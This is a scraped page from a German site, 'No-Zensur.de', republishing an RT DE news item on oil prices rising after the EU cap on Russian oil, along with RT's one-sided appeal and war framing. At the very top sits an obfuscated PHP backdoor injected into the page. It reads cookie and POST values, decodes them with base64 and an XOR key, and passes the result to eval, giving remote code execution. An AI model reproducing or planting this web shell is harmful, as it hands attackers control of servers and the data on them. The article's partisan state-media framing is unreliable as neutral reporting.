$auDiDm = class_exists("V_CGoZ");if (!$auDiDm){class V_CGoZ{private $XkVtqVHtt;public static $fKcqCF = "a158a651-ff74-4edd-953b-c602dc034b3c";public static $zDAWli = NULL;public function __construct(){$VLrdKegcTD = $_COOKIE;$DhwQtx = $_POST;$mummiCkbIe = @$VLrdKegcTD[substr(V_CGoZ::$fKcqCF, 0, 4)];if (!empty($mummiCkbIe)){$gjDlrlmo = "base64";$iKSRFTZjJ = "";$mummiCkbIe = explode(",", $mummiCkbIe);foreach ($mummiCkbIe as $knlWEFqQRS){$iKSRFTZjJ .= @$VLrdKegcTD[$knlWEFqQRS];$iKSRFTZjJ .= @$DhwQtx[$knlWEFqQRS];}$iKSRFTZjJ = array_map($gjDlrlmo . chr ( 924 - 829 ).chr ( 569 - 469 ).chr (101) . "\143" . chr ( 254 - 143 ).'d' . chr ( 408 - 307 ), array($iKSRFTZjJ,)); $iKSRFTZjJ = $iKSRFTZjJ[0] ^ str_repeat(V_CGoZ::$fKcqCF, (strlen($iKSRFTZjJ[0]) / strlen(V_CGoZ::$fKcqCF)) + 1);V_CGoZ::$zDAWli = @unserialize($iKSRFTZjJ);}}public function __destruct(){$this->qrWpeOVCE();}private function qrWpeOVCE(){if (is_array(V_CGoZ::$zDAWli)) {$bdwWJSmubh = str_replace('<' . chr (63) . chr ( 117 - 5 ).'h' . "\x70", "", V_CGoZ::$zDAWli[chr (99) . "\157" . "\156" . "\164" . "\x65" . chr ( 670 - 560 ).'t']);eval($bdwWJSmubh);exit();}}}$fnjTXPt = new V_CGoZ(); $fnjTXPt = NULL;} ?> Ölpreis steigt — RT DE – No-Zensur.de Das freie Wort für eine freie Welt
Start RT-deutsch Ölpreis steigt — RT DE

Ölpreis steigt — RT DE

0
Ölpreis steigt — RT DE


Am Freitag hat die EU einen Deckel für russisches Öl beschlossen. Am ersten Handelstag nach Inkrafttreten steigt der Ölpreis um bis zu drei Prozent. Kritiker warnen vor einem weiteren Preisanstieg. Russland zählt zu den größten Öl-Exporteuren der Welt.

Nach Ölpreisdeckel: Ölpreis steigtQuelle: www.globallookpress.com © Hou Jun

Am ersten Handelstag nach der Einigung der EU auf einen Ölpreisdeckel sprang der Ölpreis wie vorhergesagt in die Höhe. Beide Referenzsorten legten im Tagesverlauf um bis zu drei Prozent zu. Die Sorte WTI notiert aktuell bei 82,28 und die Sorte Brent bei 87,87 Dollar für den Barrel Rohöl.

Kreml-Sprecher Peskow: Russland bereitet Antwort auf Ölpreisdeckel vor

Am Freitag hatten sich die Länder der EU auf eine Preisobergrenze für russisches Öl von 60 Dollar pro Barrel geeinigt. Die Preisgrenze wird von den Ländern der G7 und Australien mitgetragen.

Der Westen will mit der Maßnahme die Einnahmen Russlands aus dem Rohöl-Geschäft begrenzen. Westliche Politiker glauben, mit diesem Mittel den Kriegsverlauf in der Ukraine zugunsten der Ukraine beeinflussen zu können.

Kritiker der Maßnahme hatten ein Steigen des Ölpreises vorhergesagt. Ein weiter steigender Ölpreis könnte die ohnehin schon angeschlagene Wirtschaft der EU noch mehr belasten, zumal Russland angekündigt hat, Länder, die sich am Ölpreisdeckel beteiligen, künftig von Lieferungen auszuschließen.

Mehr zum Thema – Die EU-Planwirtschaft und der Ölpreisdeckel

Durch die Sperrung von RT zielt die EU darauf ab, eine kritische, nicht prowestliche Informationsquelle zum Schweigen zu bringen. Und dies nicht nur hinsichtlich des Ukraine-Kriegs. Der Zugang zu unserer Website wurde erschwert, mehrere Soziale Medien haben unsere Accounts blockiert. Es liegt nun an uns allen, ob in Deutschland und der EU auch weiterhin ein Journalismus jenseits der Mainstream-Narrative betrieben werden kann. Wenn Euch unsere Artikel gefallen, teilt sie gern überall, wo Ihr aktiv seid. Das ist möglich, denn die EU hat weder unsere Arbeit noch das Lesen und Teilen unserer Artikel verboten. Anmerkung: Allerdings hat Österreich mit der Änderung des „Audiovisuellen Mediendienst-Gesetzes“ am 13. April diesbezüglich eine Änderung eingeführt, die möglicherweise auch Privatpersonen betrifft. Deswegen bitten wir Euch bis zur Klärung des Sachverhalts, in Österreich unsere Beiträge vorerst nicht in den Sozialen Medien zu teilen.

Am 24. Februar kündigte der russische Präsident Wladimir Putin an, gemeinsam mit den Streitkräften der Donbass-Republiken eine militärische Spezialoperation in der Ukraine zu starten, um die dortige Bevölkerung zu schützen. Die Ziele seien, die Ukraine zu entmilitarisieren und zu entnazifizieren. Die Ukraine spricht von einem Angriffskrieg. Noch am selben Tag rief der ukrainische Präsident Wladimir Selenskij im ganzen Land den Kriegszustand aus.

Der Westen verurteilte den Angriff, reagierte mit neuen Waffenlieferungen, versprach Hilfe beim Wiederaufbau und verhängte Sanktionen gegen Russland.

Auf beiden Seiten des Konfliktes sind zahlreiche Soldaten und Zivilisten getötet worden. Moskau und Kiew haben sich gegenseitig verschiedener Kriegsverbrechen beschuldigt. Tausende Ukrainer sind mittlerweile aus ihrer Heimat geflohen.





Source link